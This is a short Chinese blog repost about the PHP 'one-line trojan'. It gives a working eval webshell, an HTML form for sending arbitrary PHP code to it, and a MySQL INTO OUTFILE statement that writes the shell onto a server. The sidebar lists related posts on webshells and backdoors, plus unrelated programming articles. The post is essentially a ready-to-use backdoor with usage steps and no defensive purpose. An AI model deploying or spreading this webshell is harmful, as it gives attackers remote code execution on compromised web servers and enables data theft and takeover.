文档章节

关于php一句话木马

simpower
 simpower
发布于 2015/11/28 13:39
字数 227
阅读 83
收藏 2

Php代码 <EMBED height=15 type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=14 src=http://happysoul.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf allowscriptaccess="always" quality="high" flashvars="clipboard=%3C%3Fphp%20%40eval(%24_POST%5B'c'%5D)%3B%3F%3E" wmode="transparent"> 收藏代码

  1. <?php @eval($_POST['c']);?>  



使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 

Html代码 <EMBED height=15 type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=14 src=http://happysoul.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf allowscriptaccess="always" quality="high" flashvars="clipboard=%3Chtml%3E%0A%3Cbody%3E%0A%3Cform%20action%3D%22a.php%22%20method%3D%22post%22%3E%0A%3Cinput%20type%3D%22text%22%20name%3D%22c%22%20value%3D%22phpinfo()%3B%22%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22submit%22%3E%0A%3C%2Fform%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A" wmode="transparent"> 收藏代码

  1. <html>  

  2. <body>  

  3. <form action="a.php" method="post">  

  4. <input type="text" name="c" value="phpinfo();">  

  5. <input type="submit" value="submit">  

  6. </form>  

  7. </body>  

  8. </html>  




 

 

仅此做个记录,php这东西真恶心 

后补充记录: 
mysql输出文件 

Sql代码 

select '<?php @eval($_POST["c"]);?>' INTO OUTFILE 'e:/m.php'  

本文转载自:http://happysoul.iteye.com/blog/1511790

simpower
粉丝 28
博文 659
码字总数 47375
作品 0
海淀
程序员
私信 提问
从0到1学习网络安全 【Web安全入门篇-上传漏洞】

简介 这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 导致该漏洞的原因在于代码作者没有对访客提...

ihacker
2018/05/23
0
0
表弟让整理的各种一句话后门= =

php 利用404页面隐藏PHP小马 404 Not Found Not Found The requested URL was not found on this server.

SST安陌离
2017/06/08
0
0
不包含数字字母的WebShell

  前言   前一整子SUCTF没时间玩,只能偷偷关注群消息,然后看到 师傅FUZZ出来的一个webshell挺好玩的,于是偷偷记下。今天有空,就查阅了一些资料,整理一番。   一、使用异或 运算 ...

FreeBuf
2018/06/05
0
0
那些强悍的PHP一句话后门

强悍的PHP一句话后门 常用一: 所以连起来就是 assert(${_POST

科技小能手
2017/11/12
0
0
2015中国网络安全大赛:Reinstall真题

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 https://blog.csdn.net/ai64/article/details/90813820 WEB渗透实验-“2015中国网络安全大赛...

ai_64
06/04
0
0

没有更多内容

加载失败,请刷新页面

加载更多

RxJava进行单元测试的方式

@Test public void completeTask_retrievedTaskIsComplete() { // Given a new task in the persistent repository final Task newTask = new Task(TITLE, ""); ......

SuShine
1分钟前
0
0
正则表达式大全

检验手机号码 # 要求:手机号码必须为11位数字,以1开头,第二位为1或5或8。import redef verify_mobile(): mob = input("请输入手机号码:") ret = re.match(r"1[358]\d{9}", m......

彩色泡泡糖
5分钟前
0
0
QT之border-image属性

一、border-image的兼容性 border-image可以说是CSS3中的一员大将,将来一定会大放光彩,其应用潜力真的是非常的惊人。可惜目前支持的浏览器有限,仅Firefox3.5,chrome浏览器,Safari3+支持...

shzwork
5分钟前
0
0
Kubernetes Operator简易教程

1. 安装operator-sdk //安装 operator-sdk$ apt-get install operator-sdk.....$ operator-sdk versionoperator-sdk version: v0.7.0$ go versiongo version go1.11.4 darwin/amd64 2......

Robotcl_Blog
5分钟前
1
0
再谈DAG任务分解和Shuffle RDD

1、DagScheduler分析 DagScheduler功能主要是负责RDD的各个stage的分解和任务提交。Stage分解是从触发任务调度过程的finalStage开始倒推寻找父stage,如果父stage没有提交任务则循环提交缺失...

守望者之父
11分钟前
1
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部